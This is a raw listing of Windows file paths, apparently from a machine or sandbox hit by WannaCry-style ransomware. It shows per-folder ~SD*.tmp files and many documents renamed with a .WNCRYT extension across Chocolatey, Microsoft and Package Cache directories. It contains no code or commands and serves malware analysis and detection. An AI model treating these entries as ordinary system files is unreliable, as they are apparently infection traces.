C:\Users\All Users\chocolatey\.chocolatey\vcredist2015.14.0.24215.20170201\~SD79EC.tmp
C:\Users\All Users\chocolatey\.chocolatey\winrar.6.11.0.20220504\~SD79FC.tmp
C:\Users\All Users\chocolatey\bin\~SD79FD.tmp
C:\Users\All Users\chocolatey\config\~SD79FE.tmp
C:\Users\All Users\chocolatey\extensions\~SD79FF.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\~SD7A00.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\~SD7A01.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-core\~SD7A02.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\~SD7A13.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\~SD7A14.tmp
C:\Users\All Users\chocolatey\helpers\~SD7A15.tmp
C:\Users\All Users\chocolatey\helpers\functions\~SD7A16.tmp
C:\Users\All Users\chocolatey\lib\~SD7A65.tmp
C:\Users\All Users\chocolatey\lib\7zip\~SD7A76.tmp
C:\Users\All Users\chocolatey\lib\7zip.install\~SD7A86.tmp
C:\Users\All Users\chocolatey\lib\7zip.install\legal\~SD7A87.tmp
C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\7zip.install\tools\~SD7A98.tmp
C:\Users\All Users\chocolatey\lib\autohotkey.install\~SD7A99.tmp
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\~SD7AA9.tmp
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter\~SD7ABA.tmp
C:\Users\All Users\chocolatey\lib\boxstarter\tools\~SD7ABB.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\~SD7ABC.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\~SD7ABD.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\~SD7ABE.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\~SD7ABF.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\~SD7AFF.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\~SD7B0F.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\~SD7B3F.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\~SD7B5F.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\~SD7C2B.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\~SD7C9A.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\~SD7D18.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\~SD7D19.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\~SD7D97.tmp
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\~SD7DF6.tmp
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\~SD7E83.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\~SD7ED2.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\~SD7EF3.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\~SD7F71.tmp
C:\Users\All Users\chocolatey\lib\chocolatey\~SD7FA0.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\~SD7FD0.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\~SD7FF1.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\~SD805F.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\~SD80AE.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\~SD80FD.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\~SD814C.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\~SD817C.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\~SD81CB.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\~SD820B.tmp
C:\Users\All Users\chocolatey\lib\dotnet\~SD822B.tmp
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\~SD828A.tmp
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\~SD82AA.tmp
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\~SD82EA.tmp
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\~SD830A.tmp
C:\Users\All Users\chocolatey\lib\dotnet-runtime\~SD831A.tmp
C:\Users\All Users\chocolatey\lib\dotnetfx\~SD832B.tmp
C:\Users\All Users\chocolatey\lib\dotnetfx\tools\~SD832C.tmp
C:\Users\All Users\chocolatey\lib\Firefox\~SD833D.tmp
C:\Users\All Users\chocolatey\lib\Firefox\tools\~SD834D.tmp
C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv.WNCRYT
C:\Users\All Users\chocolatey\lib\GoogleChrome\~SD83AC.tmp
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\~SD83DC.tmp
C:\Users\All Users\chocolatey\lib\jre8\~SD843B.tmp
C:\Users\All Users\chocolatey\lib\jre8\tools\~SD847A.tmp
C:\Users\All Users\chocolatey\lib\KB2919355\~SD84E9.tmp
C:\Users\All Users\chocolatey\lib\KB2919355\tools\~SD8538.tmp
C:\Users\All Users\chocolatey\lib\KB2919442\~SD8539.tmp
C:\Users\All Users\chocolatey\lib\KB2919442\tools\~SD853A.tmp
C:\Users\All Users\chocolatey\lib\KB2999226\~SD8589.tmp
C:\Users\All Users\chocolatey\lib\KB2999226\tools\~SD85B9.tmp
C:\Users\All Users\chocolatey\lib\KB3033929\~SD8627.tmp
C:\Users\All Users\chocolatey\lib\KB3033929\Tools\~SD8686.tmp
C:\Users\All Users\chocolatey\lib\KB3035131\~SD86D5.tmp
C:\Users\All Users\chocolatey\lib\KB3035131\Tools\~SD86F5.tmp
C:\Users\All Users\chocolatey\lib\KB3063858\~SD8735.tmp
C:\Users\All Users\chocolatey\lib\KB3063858\Tools\~SD8765.tmp
C:\Users\All Users\chocolatey\lib\KB3118401\~SD87B4.tmp
C:\Users\All Users\chocolatey\lib\KB3118401\Tools\~SD87E4.tmp
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\~SD87E5.tmp
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\~SD87F5.tmp
C:\Users\All Users\chocolatey\lib\openjdk\~SD8806.tmp
C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\openjdk\tools\~SD8884.tmp
C:\Users\All Users\chocolatey\lib\powershell-core\~SD8894.tmp
C:\Users\All Users\chocolatey\lib\powershell-core\tools\~SD88B5.tmp
C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\~SD8904.tmp
C:\Users\All Users\chocolatey\lib\python3\legal\~SD8914.tmp
C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\tools\~SD8944.tmp
C:\Users\All Users\chocolatey\lib\tapwindows\~SD8955.tmp
C:\Users\All Users\chocolatey\lib\tapwindows\tools\~SD8966.tmp
C:\Users\All Users\chocolatey\lib\vcredist140\~SD8976.tmp
C:\Users\All Users\chocolatey\lib\vcredist140\tools\~SD89A6.tmp
C:\Users\All Users\chocolatey\lib\vcredist2005\~SD89B7.tmp
C:\Users\All Users\chocolatey\lib\vcredist2005\tools\~SD89C7.tmp
C:\Users\All Users\chocolatey\lib\vcredist2008\~SD89C8.tmp
C:\Users\All Users\chocolatey\lib\vcredist2008\tools\~SD89E9.tmp
C:\Users\All Users\chocolatey\lib\vcredist2015\~SD8A28.tmp
C:\Users\All Users\chocolatey\lib\winrar\~SD8A96.tmp
C:\Users\All Users\chocolatey\lib\winrar\tools\~SD8AD6.tmp
C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv.WNCRYT
C:\Users\All Users\chocolatey\lib-bad\~SD8B44.tmp
C:\Users\All Users\chocolatey\lib-bad\adobereader\~SD8BA3.tmp
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\~SD8BE3.tmp
C:\Users\All Users\chocolatey\logs\~SD8C41.tmp
C:\Users\All Users\chocolatey\redirects\~SD8C90.tmp
C:\Users\All Users\chocolatey\tools\~SD8D4D.tmp
C:\Users\All Users\chocolatey\tools\7zip.license.txt.WNCRYT
C:\Users\All Users\chocolatey\tools\shimgen.license.txt.WNCRYT
C:\Users\All Users\Microsoft\~SD8E19.tmp
C:\Users\All Users\Microsoft\Assistance\~SD8EA7.tmp
C:\Users\All Users\Microsoft\Assistance\Client\~SD8EB7.tmp
C:\Users\All Users\Microsoft\Assistance\Client\1.0\~SD8EF7.tmp
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\~SD8F17.tmp
C:\Users\All Users\Microsoft\ClickToRun\~SD8F47.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\~SD8F48.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\~SD8F49.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\~SD8F4A.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\~SD8F4B.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\~SD8F5C.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\~SD8F6C.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\ShortcutBackups\~SD8F8C.tmp
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\~SD8FDC.tmp
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\~SD902B.tmp
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\en-us.16\~SD90E7.tmp
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\x-none.16\~SD9117.tmp
C:\Users\All Users\Microsoft\ClickToRun\UserData\~SD9147.tmp
C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\~SD9186.tmp
C:\Users\All Users\Microsoft\Crypto\~SD91B6.tmp
C:\Users\All Users\Microsoft\Crypto\DSS\~SD91B7.tmp
C:\Users\All Users\Microsoft\Crypto\DSS\MachineKeys\~SD91B8.tmp
C:\Users\All Users\Microsoft\Crypto\Keys\~SD91B9.tmp
C:\Users\All Users\Microsoft\Crypto\PCPKSP\~SD91BA.tmp
C:\Users\All Users\Microsoft\Crypto\PCPKSP\WindowsAIK\~SD91BB.tmp
C:\Users\All Users\Microsoft\Crypto\RSA\~SD91BC.tmp
C:\Users\All Users\Microsoft\Crypto\RSA\MachineKeys\~SD91BD.tmp
C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\~SD91CE.tmp
C:\Users\All Users\Microsoft\Device Stage\~SD91CF.tmp
C:\Users\All Users\Microsoft\Device Stage\Device\~SD91D0.tmp
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\~SD91D1.tmp
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\~SD91D2.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\~SD91D3.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\~SD91D4.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\~SD91F4.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\~SD9272.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\~SD92B2.tmp
C:\Users\All Users\Microsoft\DeviceSync\~SD92D2.tmp
C:\Users\All Users\Microsoft\Diagnosis\~SD9302.tmp
C:\Users\All Users\Microsoft\Diagnosis\AsimovUploader\~SD9341.tmp
C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\~SD93B0.tmp
C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\~SD93FF.tmp
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\~SD943E.tmp
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\AutoLogger\~SD945F.tmp
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\~SD94AE.tmp
C:\Users\All Users\Microsoft\Diagnosis\LocalTraceStore\~SD951C.tmp
C:\Users\All Users\Microsoft\Diagnosis\Sideload\~SD955C.tmp
C:\Users\All Users\Microsoft\DRM\~SD958B.tmp
C:\Users\All Users\Microsoft\DRM\Server\~SD95DB.tmp
C:\Users\All Users\Microsoft\EdgeUpdate\~SD962A.tmp
C:\Users\All Users\Microsoft\EdgeUpdate\Log\~SD9669.tmp
C:\Users\All Users\Microsoft\eHome\~SD9689.tmp
C:\Users\All Users\Microsoft\eHome\logs\~SD96E8.tmp
C:\Users\All Users\Microsoft\Event Viewer\~SD9737.tmp
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\~SD9767.tmp
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\~SD9797.tmp
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\~SD97D7.tmp
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\Sysmon\~SD9835.tmp
C:\Users\All Users\Microsoft\Event Viewer\Views\~SD9884.tmp
C:\Users\All Users\Microsoft\Event Viewer\Views\ApplicationViewsRootNode\~SD98F3.tmp
C:\Users\All Users\Microsoft\IdentityCRL\~SD9913.tmp
C:\Users\All Users\Microsoft\Media Player\~SD9924.tmp
C:\Users\All Users\Microsoft\MF\~SD9925.tmp
C:\Users\All Users\Microsoft\Microsoft Security Client\~SD9926.tmp
C:\Users\All Users\Microsoft\Microsoft Security Client\Support\~SD9956.tmp
C:\Users\All Users\Microsoft\NetFramework\~SD9976.tmp
C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\~SD99E4.tmp
C:\Users\All Users\Microsoft\Network\~SD9AC0.tmp
C:\Users\All Users\Microsoft\Network\Connections\~SD9B0F.tmp
C:\Users\All Users\Microsoft\Network\Downloader\~SD9B3F.tmp
C:\Users\All Users\Microsoft\Office\~SD9B6F.tmp
C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\~SD9BED.tmp
C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\~SD9C6B.tmp
C:\Users\All Users\Microsoft\RAC\~SD9CCA.tmp
C:\Users\All Users\Microsoft\RAC\Outbound\~SD9D19.tmp
C:\Users\All Users\Microsoft\RAC\PublishedData\~SD9D39.tmp
C:\Users\All Users\Microsoft\RAC\StateData\~SD9DA7.tmp
C:\Users\All Users\Microsoft\RAC\Temp\~SD9DF6.tmp
C:\Users\All Users\Microsoft\Search\~SD9E26.tmp
C:\Users\All Users\Microsoft\Search\Data\~SD9E66.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\~SD9EC5.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\~SD9EC6.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Config\~SD9ED6.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\~SD9ED7.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\~SD9ED8.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\~SD9ED9.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\~SD9EDA.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\~SD9EDB.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\~SD9EDC.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\~SD9EFC.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\~SD9EFD.tmp
C:\Users\All Users\Microsoft\Search\Data\Temp\~SD9EFE.tmp
C:\Users\All Users\Microsoft\Search\Data\Temp\usgthrsvc\~SD9F0F.tmp
C:\Users\All Users\Microsoft\User Account Pictures\~SD9F10.tmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\~SD9F11.tmp
C:\Users\All Users\Microsoft\Vault\~SD9F12.tmp
C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\~SD9F13.tmp
C:\Users\All Users\Microsoft\Windows\~SD9F24.tmp
C:\Users\All Users\Microsoft\Windows\AIT\~SD9F25.tmp
C:\Users\All Users\Microsoft\Windows\Caches\~SD9F26.tmp
C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\~SD9F27.tmp
C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\~SD9F28.tmp
C:\Users\All Users\Microsoft\Windows\DRM\~SD9F58.tmp
C:\Users\All Users\Microsoft\Windows\DRM\Cache\~SD9F97.tmp
C:\Users\All Users\Microsoft\Windows\GameExplorer\~SD9FE6.tmp
C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\~SDA035.tmp
C:\Users\All Users\Microsoft\Windows\Ringtones\~SDA0C3.tmp
C:\Users\All Users\Microsoft\Windows\Sqm\~SDA1BE.tmp
C:\Users\All Users\Microsoft\Windows\Sqm\Manifest\~SDA1DE.tmp
C:\Users\All Users\Microsoft\Windows\Sqm\Sessions\~SDA21E.tmp
C:\Users\All Users\Microsoft\Windows\Sqm\Upload\~SDA22E.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\~SDA22F.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\~SDA230.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\~SDA260.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\~SDA2BF.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SDA2FE.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDA33E.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\~SDA35E.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\~SDA3AD.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SDA3DD.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoHotkey\~SDA3FD.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Boxstarter\~SDA3FE.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\~SDA40F.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\~SDA420.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDA421.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\~SDA422.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\PowerShell\~SDA432.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 3.8\~SDA433.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\~SDA434.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\WinRAR\~SDA445.tmp
C:\Users\All Users\Microsoft\Windows\Templates\~SDA456.tmp
C:\Users\All Users\Microsoft\Windows\WER\~SDA4A5.tmp
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\~SDA4F4.tmp
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\~SDA543.tmp
C:\Users\All Users\Microsoft\Windows Defender\~SDA563.tmp
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\~SDA583.tmp
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Backup\~SDA584.tmp
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Updates\~SDA585.tmp
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{8AF8DC04-1885-4F22-8F09-BD1E568EBC7A}\~SDA586.tmp
C:\Users\All Users\Microsoft\Windows Defender\LocalCopy\~SDA587.tmp
C:\Users\All Users\Microsoft\Windows Defender\Quarantine\~SDA588.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\~SDA5B8.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\~SDA694.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\~SDA6F3.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\~SDA742.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\Resource\~SDA791.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service\~SDA7D1.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Store\~SDA7D2.tmp
C:\Users\All Users\Microsoft\Windows Defender\Support\~SDA7E2.tmp
C:\Users\All Users\Microsoft\Windows NT\~SDA7E3.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\~SDA7E4.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\ActivityLog\~SDA7E5.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\~SDA7E6.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\~SDA7E7.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\Inbox\~SDA7F8.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\Queue\~SDA7F9.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\SentItems\~SDA7FA.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\~SDA7FB.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\~SDA7FC.tmp
C:\Users\All Users\Microsoft\Windows NT\MSScan\~SDA7FD.tmp
C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT
C:\Users\All Users\Microsoft\WwanSvc\~SDA83C.tmp
C:\Users\All Users\Microsoft OneDrive\~SDA83E.tmp
C:\Users\All Users\Microsoft OneDrive\setup\~SDA83F.tmp
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\~SDA8CD.tmp
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\~SDA8FD.tmp
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\~SDA95C.tmp
C:\Users\All Users\Oracle\~SDA9AB.tmp
C:\Users\All Users\Oracle\Java\~SDA9FA.tmp
C:\Users\All Users\Oracle\Java\installcache\~SDAA2A.tmp
C:\Users\All Users\Oracle\Java\installcache_x64\~SDAA88.tmp
C:\Users\All Users\Package Cache\~SDAC7D.tmp
C:\Users\All Users\Package Cache\{0627E042-BBD1-4FE2-AAEF-C54BA4A69326}v3.8.10150.0\~SDAD1B.tmp
C:\Users\All Users\Package Cache\{08c3379c-d122-42a4-917e-b3dc470fbcb3}\~SDAD1C.tmp
C:\Users\All Users\Package Cache\{21F60B75-2A5E-4064-A38A-D59A347B4433}v3.8.10150.0\~SDAD1D.tmp
C:\Users\All Users\Package Cache\{2dd73f73-784c-4c71-9495-fd11cd6eddf6}\~SDAD1E.tmp
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\~SDAD3E.tmp
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\~SDAD8D.tmp
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\vcRuntimeMinimum_amd64\~SDADEC.tmp
C:\Users\All Users\Package Cache\{3746f21b-c990-4045-bb33-1cf98cff7a68}\~SDAE99.tmp
C:\Users\All Users\Package Cache\{4196628C-AE5C-4304-B166-B7C1E93CDC25}v3.8.10150.0\~SDAF07.tmp
C:\Users\All Users\Package Cache\{4AF94EBC-F592-4502-B0EA-07764E7F820B}v3.8.10150.0\~SDAF47.tmp
C:\Users\All Users\Package Cache\{4CA4F71B-58C3-42ED-83FA-AD7AC9E9C0CB}v48.47.50420\~SDAF96.tmp
C:\Users\All Users\Package Cache\{54DE7EA9-E391-4BD2-A373-3A72A18EBDB5}v40.68.31213\~SDAFE5.tmp
C:\Users\All Users\Package Cache\{59650A2A-3839-46EC-9D9C-6B3B1C743C55}v40.68.31213\~SDB024.tmp
C:\Users\All Users\Package Cache\{5A66E598-37BD-4C8A-A7CB-A71C32ABCD78}v40.68.31213\~SDB054.tmp
C:\Users\All Users\Package Cache\{5E63E49B-C88C-46C5-855C-A7B07C11CDC8}v48.47.50420\~SDB074.tmp
C:\Users\All Users\Package Cache\{81CDF5BF-4777-4CF8-B6CC-0902061F7314}v3.8.7427.0\~SDB0C4.tmp
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\~SDB113.tmp
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\~SDB162.tmp
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\vcRuntimeAdditional_x86\~SDB1A1.tmp
C:\Users\All Users\Package Cache\{8BA25391-0BE6-443A-8EBF-86A29BAFC479}v40.68.31213\~SDB200.tmp
C:\Users\All Users\Package Cache\{94EE74AD-4205-4038-8748-000D966FA407}v48.47.50420\~SDB24F.tmp
C:\Users\All Users\Package Cache\{a699b48e-5748-4980-ad92-0b61b1d9d718}\~SDB26F.tmp
C:\Users\All Users\Package Cache\{a98dc6ff-d360-4878-9f0a-915eba86eaf3}\~SDB2FD.tmp
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\~SDB32D.tmp
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\~SDB34D.tmp
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\vcRuntimeMinimum_x86\~SDB36D.tmp
C:\Users\All Users\Package Cache\{AF01038B-6523-4EA7-9D9E-4F1E2927D88B}v40.68.31213\~SDB3CC.tmp
C:\Users\All Users\Package Cache\{B87AB233-E9C5-4459-8E4A-952EACECCFC4}v48.47.50420\~SDB40C.tmp
C:\Users\All Users\Package Cache\{B92B890A-04F2-4880-BA20-20D4364FB263}v48.47.50420\~SDB42C.tmp
C:\Users\All Users\Package Cache\{C3DD1448-513A-4DB8-978D-6991562EA63D}v48.47.50420\~SDB46B.tmp
C:\Users\All Users\Package Cache\{CD1C027B-BC87-4C8E-993D-1779A12BF141}v3.8.10150.0\~SDB4AB.tmp
C:\Users\All Users\Package Cache\{D9D74D16-6E0C-417B-AA63-557EEED5AED1}v3.8.10150.0\~SDB4CB.tmp
C:\Users\All Users\Package Cache\{DF5D4A27-B019-41FB-ACA8-62EE9947F452}v3.8.10150.0\~SDB50B.tmp
